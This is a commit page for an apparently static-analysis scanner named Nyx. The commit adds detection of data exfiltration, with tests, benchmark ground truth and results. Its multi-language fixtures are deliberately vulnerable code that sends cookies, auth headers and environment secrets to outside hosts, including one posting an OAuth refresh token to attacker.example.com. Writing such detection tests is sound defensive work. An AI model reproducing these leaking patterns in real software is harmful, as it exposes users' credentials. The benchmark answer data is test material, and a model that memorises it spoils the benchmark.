Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
This commit is contained in:
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

View file

@ -104,7 +104,33 @@ fn demand_driven_suite() {
"no_source: no backwards-confirmed notes on a source-free fixture"
);
// ── 5. backwards OFF is a strict no-op: no confirmed notes.
// ── 5. data_exfil cap parity: the backwards engine must
// round-trip `Cap::DATA_EXFIL` exactly like SQL/CMD/SSRF.
// The forward engine fires `taint-data-exfiltration`
// on a cookie → fetch-body flow; backwards must reach
// the request.cookies source and confirm.
set_backwards(true);
let dir = fixture_path("demand_driven_data_exfil");
let diags = scan_fixture_dir(&dir, AnalysisMode::Full);
validate_expectations(&diags, &dir);
let exfil_confirmed = diags
.iter()
.filter(|d| {
d.id.starts_with("taint-data-exfiltration")
&& has_backwards_note(d, "backwards-confirmed")
})
.count();
assert!(
exfil_confirmed >= 1,
"data_exfil: expected ≥1 backwards-confirmed taint-data-exfiltration finding; got diags: {}",
diags
.iter()
.map(|d| format!("{}:{}", d.id, d.line))
.collect::<Vec<_>>()
.join(", ")
);
// ── 6. backwards OFF is a strict no-op: no confirmed notes.
set_backwards(false);
let dir = fixture_path("demand_driven_reach_source");
let diags = scan_fixture_dir(&dir, AnalysisMode::Full);

View file

@ -0,0 +1,17 @@
// DATA_EXFIL: env-config (Sensitive source) flows into the gated
// curl_easy_setopt sink at the CURLOPT_POSTFIELDS activation. The
// destination URL is set by a separate CURLOPT_URL setopt above; only
// the body-binding setopt fires DATA_EXFIL.
#include <curl/curl.h>
#include <stdlib.h>
void leak_env(void) {
char *token = getenv("AUTH_TOKEN");
if (!token) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,16 @@
// DATA_EXFIL safe: plain user input via fgets/stdin forwarded into the
// CURLOPT_POSTFIELDS body of a fixed-URL curl request must not fire.
// Sensitivity-gate strips the cap for Plain-tier sources.
#include <curl/curl.h>
#include <stdio.h>
void forward_stdin(void) {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,14 @@
// DATA_EXFIL: a session cookie (Sensitive source) flows into the body
// of http.Post() at a hardcoded destination URL.
package fixture
import (
"net/http"
"strings"
)
func leakCookie(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
http.Post("https://analytics.internal/track", "text/plain", body)
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL safe: plain attacker-controlled user input forwarded to a
// fixed-destination http.Post body must not fire. Sensitivity-gate
// strips the cap because the source is Plain-tier user input.
package fixture
import (
"net/http"
"strings"
)
func forwardUserInput(r *http.Request) {
msg := r.FormValue("msg")
body := strings.NewReader(msg)
http.Post("https://analytics.internal/track", "text/plain", body)
}

View file

@ -0,0 +1,23 @@
// DATA_EXFIL: a Sensitive cookie source flows through
// BodyPublishers.ofString() into the request builder chain and finally
// into client.send() at a hardcoded destination URL.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
public class DataExfilJdkHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue();
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create("https://analytics.internal/track"))
.POST(BodyPublishers.ofString(session))
.build();
client.send(req, BodyHandlers.ofString());
}
}

View file

@ -0,0 +1,24 @@
// DATA_EXFIL: an OkHttp two-step where a session attribute (Sensitive
// source) is wrapped via RequestBody.create and bound to a request
// targeting a hardcoded URL. The chain-normalized newCall.execute
// matcher fires DATA_EXFIL on the body bind.
import javax.servlet.http.HttpSession;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
public class DataExfilOkHttp {
public void leak(HttpSession session) throws Exception {
String token = (String) session.getAttribute("csrfToken");
OkHttpClient client = new OkHttpClient();
RequestBody body = RequestBody.create(
token, MediaType.parse("text/plain"));
Request req = new Request.Builder()
.url("https://analytics.internal/track")
.post(body)
.build();
Response resp = client.newCall(req).execute();
}
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at a fixed destination. SSRF must NOT fire
// because the URL is a hardcoded literal.
function leakBody(req) {
var payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at an attacker-controlled host. SSRF stays
// silent (URL is a static literal); DATA_EXFIL fires.
function leakBodyExternal(req) {
var payload = req.cookies.session;
fetch('https://untrusted.example.com/intake', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,9 @@
// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
// body of XMLHttpRequest.send(). The destination is a static literal, so
// SSRF must not fire.
function leakHeader(req) {
var auth = req.headers.authorization;
var xhr = new XMLHttpRequest();
xhr.open('POST', '/upstream');
xhr.send(auth);
}

View file

@ -0,0 +1,8 @@
// DATA_EXFIL safe: routing a Sensitive cookie source through the named
// telemetry boundary `logEvent` is the developer's explicit decision to
// forward; the default Sanitizer(data_exfil) convention strips the cap.
function track(req) {
logEvent({
user: req.cookies.session,
});
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL safe: plain user input echoed into a fetch() body must not
// fire. The user already controls req.body.message; surfacing it back
// into the outbound payload is not a cross-boundary disclosure.
function forwardUserMessage(req) {
var message = req.body.message;
fetch('/forward', {
method: 'POST',
body: message,
});
}

View file

@ -0,0 +1,17 @@
import os
from fastapi import FastAPI, Request
import httpx
app = FastAPI()
# DATA_EXFIL: env-config secret flows into the json kwarg of an async
# httpx.AsyncClient().post() at a fixed destination URL.
@app.post('/sync-async')
async def sync_async(req: Request):
api_key = os.environ.get('UPSTREAM_API_KEY')
await httpx.AsyncClient().post(
'https://upstream.internal/ingest',
json={'api_key': api_key},
)
return {'ok': True}

View file

@ -0,0 +1,16 @@
import os
import requests
from flask import Flask
app = Flask(__name__)
# DATA_EXFIL: env-config secrets accumulate into a dict, then flow as the
# json kwarg of requests.post() at a fixed destination URL.
@app.route('/upload-config', methods=['POST'])
def upload_config():
payload = {}
payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')
payload['region'] = os.environ.get('UPSTREAM_REGION')
requests.post('https://api.internal/ingest', json=payload)
return 'ok'

View file

@ -0,0 +1,14 @@
import requests
from flask import Flask, request
app = Flask(__name__)
# DATA_EXFIL safe: plain user input echoed into a fixed-destination
# requests.post body must not fire. Sensitivity-gate strips the cap
# because the source is Plain-tier (raw user input).
@app.route('/forward', methods=['POST'])
def forward():
message = request.form.get('message')
requests.post('https://telemetry.internal/forward', json={'message': message})
return 'ok'

View file

@ -0,0 +1,10 @@
require 'net/http'
require 'uri'
# DATA_EXFIL: a session cookie (Sensitive source) flows into the body
# of Net::HTTP.post at a fixed destination URL.
def forward_session(request)
sid = request.cookies[:auth_token]
uri = URI('https://analytics.internal/track')
Net::HTTP.post(uri, "session=#{sid}")
end

View file

@ -0,0 +1,12 @@
require 'rest-client'
# DATA_EXFIL safe: plain user input echoed into a RestClient.post body
# at a fixed destination URL must not fire. Sensitivity-gate strips the
# cap for Plain-tier sources.
def forward_message(params)
message = params[:message]
RestClient.post(
'https://telemetry.internal/forward',
{ message: message }.to_json
)
end

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: env-config (Sensitive source) flows into reqwest's .form()
// chain at a fixed destination URL. The form-encoded payload leaks the
// operator-bound secret across the outbound boundary.
fn exfil_form() {
let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.form(&secret)
.send();
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a session cookie (Sensitive-tier source) flows into the
// outbound body of fetch() at a fixed destination. SSRF must NOT fire
// because the URL is a hardcoded literal.
function leakBody(req: { cookies: { session: string } }): void {
const payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: a request header (Sensitive-tier source) flows into the
// body of fetch() via the body field of the init object. Destination is
// a static literal so SSRF must not fire.
function leakHeader(req: { headers: { authorization: string } }): void {
const auth = req.headers.authorization;
fetch('https://analytics.internal/track', {
method: 'POST',
body: auth,
});
}

View file

@ -3,7 +3,7 @@
"metadata": {
"description": "Nyx benchmark ground truth",
"created": "2026-03-20",
"corpus_size": 458
"corpus_size": 477
},
"cases": [
{
@ -14474,6 +14474,576 @@
],
"disabled": false,
"notes": "Vulnerable counterpart to py-auth-realrepo-005: same FastAPI route shape but no `dependencies=[Depends(...)]` keyword arg. Regression guard: the dependency-injection recogniser must not blanket-suppress every FastAPI route."
},
{
"case_id": "js-data_exfil-001",
"file": "javascript/data_exfil/exfil_fetch_cookie_body.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie"
],
"disabled": false,
"notes": "Cookie source flows into fetch body at hardcoded URL; DATA_EXFIL must fire and SSRF must not."
},
{
"case_id": "js-data_exfil-002",
"file": "javascript/data_exfil/exfil_fetch_external_destination.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie",
"external-destination"
],
"disabled": false,
"notes": "Cookie source flows into fetch body at attacker-controlled host; DATA_EXFIL fires, SSRF does not."
},
{
"case_id": "js-data_exfil-003",
"file": "javascript/data_exfil/exfil_xhr_send_header.js",
"language": "javascript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[8, 8]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"xhr",
"header"
],
"disabled": false,
"notes": "Authorization header source flows into XMLHttpRequest.send body at hardcoded URL."
},
{
"case_id": "ts-data_exfil-001",
"file": "typescript/data_exfil/exfil_fetch_cookie_body.ts",
"language": "typescript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"cookie"
],
"disabled": false,
"notes": "TypeScript variant of js-data_exfil-001."
},
{
"case_id": "ts-data_exfil-002",
"file": "typescript/data_exfil/exfil_fetch_header_body.ts",
"language": "typescript",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[6, 9]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"fetch",
"header"
],
"disabled": false,
"notes": "Authorization header flows into fetch body at hardcoded URL."
},
{
"case_id": "py-data_exfil-001",
"file": "python/data_exfil/exfil_requests_post_env_dict.py",
"language": "python",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[14, 14]
],
"expected_source_lines": [
[12, 13]
],
"tags": [
"data_exfil",
"requests",
"env",
"container"
],
"disabled": false,
"notes": "Env-config secrets accumulate into a dict, then flow as the json kwarg of requests.post; container-taint round-trip."
},
{
"case_id": "py-data_exfil-002",
"file": "python/data_exfil/exfil_httpx_async_post_env.py",
"language": "python",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[12, 15]
],
"expected_source_lines": [
[11, 11]
],
"tags": [
"data_exfil",
"httpx",
"async",
"env"
],
"disabled": false,
"notes": "Env-config secret flows into httpx.AsyncClient().post json kwarg via the type-qualified HttpClient.post matcher."
},
{
"case_id": "java-data_exfil-001",
"file": "java/data_exfil/DataExfilJdkHttpClient.java",
"language": "java",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[16, 20]
],
"expected_source_lines": [
[13, 14]
],
"tags": [
"data_exfil",
"jdk-httpclient",
"cookie"
],
"disabled": false,
"notes": "Servlet cookie value flows through BodyPublishers.ofString into HttpClient.send body."
},
{
"case_id": "java-data_exfil-002",
"file": "java/data_exfil/DataExfilOkHttp.java",
"language": "java",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[15, 21]
],
"expected_source_lines": [
[13, 13]
],
"tags": [
"data_exfil",
"okhttp",
"session"
],
"disabled": false,
"notes": "HttpSession attribute wraps via RequestBody.create and binds to OkHttp Request.Builder.post; chain-normalized newCall.execute fires DATA_EXFIL."
},
{
"case_id": "go-data_exfil-001",
"file": "go/data_exfil/exfil_http_post_cookie_body.go",
"language": "go",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[12, 12]
],
"expected_source_lines": [
[10, 11]
],
"tags": [
"data_exfil",
"http-post",
"cookie"
],
"disabled": false,
"notes": "Cookie value flows via strings.NewReader into http.Post body at hardcoded URL."
},
{
"case_id": "rs-data_exfil-001",
"file": "rust/data_exfil/exfil_reqwest_form_env.rs",
"language": "rust",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[5, 8]
],
"expected_source_lines": [
[5, 5]
],
"tags": [
"data_exfil",
"reqwest",
"form",
"env"
],
"disabled": false,
"notes": "env::var secret flows into reqwest .form() body chain via the form.send body-bind matcher."
},
{
"case_id": "rb-data_exfil-001",
"file": "ruby/data_exfil/exfil_net_http_post_cookie.rb",
"language": "ruby",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "HIGH",
"expected_category": "Security",
"expected_sink_lines": [
[9, 9]
],
"expected_source_lines": [
[7, 7]
],
"tags": [
"data_exfil",
"net-http",
"cookie"
],
"disabled": false,
"notes": "request.cookies value flows into Net::HTTP.post body at hardcoded URL."
},
{
"case_id": "c-data_exfil-001",
"file": "c/data_exfil/exfil_curl_postfields_env.c",
"language": "c",
"is_vulnerable": true,
"vuln_class": "data_exfil",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [
"taint-data-exfiltration"
],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [],
"expected_severity": "MEDIUM",
"expected_category": "Security",
"expected_sink_lines": [
[14, 14]
],
"expected_source_lines": [
[9, 9]
],
"tags": [
"data_exfil",
"curl",
"gated-sink",
"env"
],
"disabled": false,
"notes": "getenv secret flows into curl_easy_setopt CURLOPT_POSTFIELDS body; gated-sink fires only at the body-binding setopt."
},
{
"case_id": "js-safe-data_exfil-001",
"file": "javascript/safe/safe_data_exfil_sanitizer_wrap.js",
"language": "javascript",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"sanitizer-wrap"
],
"disabled": false,
"notes": "Cookie source routed through default forwarding-wrapper sanitizer (logEvent); DATA_EXFIL must not fire."
},
{
"case_id": "js-safe-data_exfil-002",
"file": "javascript/safe/safe_data_exfil_user_input_echo.js",
"language": "javascript",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "Plain user input echoed into fetch body at fixed URL; sensitivity-gate suppresses Plain-tier sources for Cap::DATA_EXFIL."
},
{
"case_id": "py-safe-data_exfil-001",
"file": "python/safe/safe_data_exfil_user_input_echo.py",
"language": "python",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "Flask form-field echoed into requests.post json at fixed URL; sensitivity-gate suppresses Plain-tier user input."
},
{
"case_id": "go-safe-data_exfil-001",
"file": "go/safe/safe_data_exfil_user_input_echo.go",
"language": "go",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "FormValue plain user input echoed into http.Post body at fixed URL; sensitivity-gate suppresses Plain-tier sources."
},
{
"case_id": "rb-safe-data_exfil-001",
"file": "ruby/safe/safe_data_exfil_user_input_echo.rb",
"language": "ruby",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "params plain user input echoed into RestClient.post body at fixed URL; sensitivity-gate suppresses Plain-tier sources."
},
{
"case_id": "c-safe-data_exfil-001",
"file": "c/safe/safe_data_exfil_user_input_echo.c",
"language": "c",
"is_vulnerable": false,
"vuln_class": "safe",
"cwe": "CWE-201",
"provenance": "synthetic",
"equivalence_tier": "exact",
"match_mode": "rule_match",
"expected_rule_ids": [],
"allowed_alternative_rule_ids": [],
"forbidden_rule_ids": [
"taint-data-exfiltration"
],
"expected_severity": null,
"expected_category": "Security",
"expected_sink_lines": [],
"expected_source_lines": [],
"tags": [
"data_exfil",
"safe",
"user-input-gate"
],
"disabled": false,
"notes": "fgets stdin user input echoed into curl_easy_setopt CURLOPT_POSTFIELDS at fixed URL; sensitivity-gate suppresses Plain-tier sources."
}
]
}

View file

@ -1,6 +1,6 @@
{
"benchmark_version": "1.0",
"timestamp": "2026-04-29T21:50:34Z",
"timestamp": "2026-04-30T23:44:32Z",
"scanner_version": "0.5.0",
"scanner_config": {
"analysis_mode": "Full",
@ -9,9 +9,9 @@
"state_analysis_enabled": true,
"worker_threads": 1
},
"ground_truth_hash": "sha256:5b391d654f88673e5a200af875d513cf83812af747739395e8315768b8983ce3",
"corpus_size": 458,
"cases_run": 457,
"ground_truth_hash": "sha256:228d1577d9560cfa08521e783ec513509363470455743a43a4102df713af1849",
"corpus_size": 477,
"cases_run": 476,
"cases_skipped": 1,
"outcomes": [
{
@ -181,6 +181,25 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "c-data_exfil-001",
"file": "c/data_exfil/exfil_curl_postfields_env.c",
"language": "c",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 9:19)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 9:19)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "c-fmt-001",
"file": "c/fmt_string/fmt_printf.c",
@ -455,6 +474,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "c-safe-data_exfil-001",
"file": "c/safe/safe_data_exfil_user_input_echo.c",
"language": "c",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "c-ssrf-001",
"file": "c/ssrf/ssrf_curl.c",
@ -1685,11 +1719,14 @@
"matched_rule_ids": [
"rb.deser.yaml_load"
],
"unexpected_rule_ids": [],
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink",
"rb.deser.yaml_load"
],
"security_finding_count": 1,
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
@ -2066,6 +2103,25 @@
"security_finding_count": 3,
"non_security_finding_count": 0
},
{
"case_id": "go-data_exfil-001",
"file": "go/data_exfil/exfil_http_post_cookie_body.go",
"language": "go",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 11:10)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 11:10)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "go-fmt_string-001",
"file": "go/fmt_string/fmt_injection.go",
@ -2453,6 +2509,21 @@
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "go-safe-data_exfil-001",
"file": "go/safe/safe_data_exfil_user_input_echo.go",
"language": "go",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"non_security_finding_count": 0
},
{
"case_id": "go-safe-fieldproj-phase3",
"file": "go/safe/safe_chained_receiver_field_proj.go",
@ -2660,15 +2731,13 @@
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 8:9)",
"taint-unsanitised-flow (source 8:9)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-unsanitised-flow (source 8:9)",
"taint-unsanitised-flow (source 8:9)"
],
"security_finding_count": 2,
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -2840,6 +2909,44 @@
"security_finding_count": 2,
"non_security_finding_count": 0
},
{
"case_id": "java-data_exfil-001",
"file": "java/data_exfil/DataExfilJdkHttpClient.java",
"language": "java",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:28)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:28)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "java-data_exfil-002",
"file": "java/data_exfil/DataExfilOkHttp.java",
"language": "java",
"vuln_class": "data_exfil",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-data-exfiltration (source 14:33)"
],
"unexpected_rule_ids": [],
"all_finding_ids": [
"taint-data-exfiltration (source 14:33)"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
"case_id": "java-deser-001",
"file": "java/deser/DeserOis.java",
@ -3005,13 +3112,17 @@
"language": "java",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3095,13 +3206,17 @@
"language": "java",
"vuln_class": "safe",
"is_vulnerable": false,
"outcome_file_level": "TN",
"outcome_rule_level": "TN",
"outcome_file_level": "FP",
"outcome_rule_level": "FP",
"outcome_location_level": null,
"matched_rule_ids": [],
"unexpected_rule_ids": [],
"all_finding_ids": [],
"security_finding_count": 0,
"unexpected_rule_ids": [
"cfg-unguarded-sink"
],
"all_finding_ids": [
"cfg-unguarded-sink"
],
"security_finding_count": 1,
"non_security_finding_count": 0
},
{
@ -3321,14 +3436,14 @@
"vuln_class": "ssrf",
"is_vulnerable": true,
"outcome_file_level": "TP",
"outcome_rule_level": "TP",
"outcome_location_level": "TP",
"matched_rule_ids": [
"taint-unsanitised-flow (source 7:22)"
"outcome_rule_level": "FN",
